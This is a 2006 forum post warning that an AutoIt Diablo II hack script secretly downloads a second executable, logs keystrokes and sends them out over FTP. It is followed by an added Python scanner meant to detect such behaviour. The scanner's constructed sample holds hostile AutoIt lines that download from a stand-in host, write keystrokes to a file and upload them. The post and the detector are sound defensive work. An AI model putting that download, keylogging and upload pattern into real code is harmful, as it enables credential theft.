Now without breaking that deal, I want to warn anyone I can. This script is listed as being a TPPK program, and my virus scanner did not flag it. What this script really does is this:
1) Gets a file here --> http://www.cronz.com..._cfa12eb43d.exe (do not download this!!!)
See the edit at the bottom of the page about this file.
2) Saves it here --> C:\Program Files\Diablo II\temp.exe
3) Runs C:\Program Files\Diablo II\Diablo II.exe
4) Logs every keystroke you make and saves them to a .txt file here --> C:\WINDOWS\log\pw.txt
5) Uses _FTP functions to send this information to a specified server address.
6) All while pretending to be functioning exactly as you might expect it to, making you feel like a fool when you find out your account was jacked.
There are a few other things this does, but that about sums it up. I really didn't want to give him his source, but I made a deal. He probably needed the source because he had to change his FTP server because they shut him down or something, who knows.
Just be wary of where you get any of your hacks. A lot of AutoIt programs like this are not showing up on virus scanners. They can also do all of this while performing the functions you are expecting them to, and without you even knowing. This script wasn't the best I've seen (like he automatically assumes everyone has D2 at C:\Program Files\Diablo II instead of using the registry to find it automatically) but it was good enough that it would've had me fooled if I didn't look at the source before running it.
Not much else to say, just be cautious. He is probably going to change the name of the script or something since I decompiled it for him. So it will likely be recirculated under a different prefix.
Nomad :hunter:
Edit: The file that the script downloads was written in another language. I can't view the source and I'm sure as hell not running it. So I have no idea what it does.
Edit: I also just had a well drawn out argument at the AutoIt forums about this. I shouldn't have let it get to the point it did, but I did. It seems that a few people were upset that I gave him his source code back after I realized it was malware (one person in general). A few others said they supported my decision to honor my word and about the fact that I was honest about telling everyone what happened. I stand behind my decision. This script was one of hundreds out there, and I was completely honest about the entire situation. I made a mistake by not stipulating that if it was malware, the deal was off. All I can do is learn from my mistake and not let it happen again. Just some info about that in case any of you saw the "discussion" since it was pretty much the hot topic of the day. Nomad :hunter:
Edited by Nomad, 18 July 2006 - 12:35 AM.
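The post's advice is to read the source before running it. As an added example (not part of the original post and not Nomad's code), here is a small static check that reads AutoIt source and reports the behaviour combinations listed above. The AutoIt function names are real, but grouping them into capabilities is this example's assumption, and the sample script is constructed for illustration.

```python
import re

# Capability -> pattern over AutoIt source lines (grouping is an assumption).
CAPABILITIES = {
    "download":   re.compile(r"\b(InetGet|InetRead)\s*\(", re.I),
    "execute":    re.compile(r"\b(Run|RunWait|ShellExecute|ShellExecuteWait)\s*\(", re.I),
    "keystrokes": re.compile(r"\b(_IsPressed|HotKeySet|GetAsyncKeyState)\b", re.I),
    "file_write": re.compile(r"\b(FileWrite|FileWriteLine)\s*\(", re.I),
    "ftp_upload": re.compile(r"\b_FTP_?\w*\s*\(", re.I),
}

# A single capability is common in benign scripts; the combinations are the signal.
COMBOS = {
    "downloads and runs a second-stage file": {"download", "execute"},
    "records keystrokes to disk": {"keystrokes", "file_write"},
    "uploads collected data over FTP": {"file_write", "ftp_upload"},
}

def scan(source):
    """Return {capability: [line numbers]} for non-comment lines."""
    hits = {}
    for number, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith(";"):   # AutoIt full-line comment
            continue
        for capability, pattern in CAPABILITIES.items():
            if pattern.search(line):
                hits.setdefault(capability, []).append(number)
    return hits

def triage(source):
    """Return the labels of every suspicious combination present."""
    found = set(scan(source))
    return [label for label, needed in COMBOS.items() if needed <= found]

# Constructed sample that mirrors the steps in the post; not the real script.
SAMPLE = r'''
; constructed sample, not the script from the post
InetGet("http://example.invalid/payload.exe", "C:\Program Files\Diablo II\temp.exe")
Run("C:\Program Files\Diablo II\Diablo II.exe")
If _IsPressed("41") Then FileWrite("C:\WINDOWS\log\pw.txt", "a")
_FTP_FilePut($conn, "C:\WINDOWS\log\pw.txt", "pw.txt")
'''

if __name__ == "__main__":
    for capability, lines in scan(SAMPLE).items():
        print(f"{capability}: lines {lines}")
    for label in triage(SAMPLE):
        print("FLAG:", label)
```

This only works on readable source; a compiled AutoIt executable has to be unpacked first, and a clean result says nothing about a second file the script downloads.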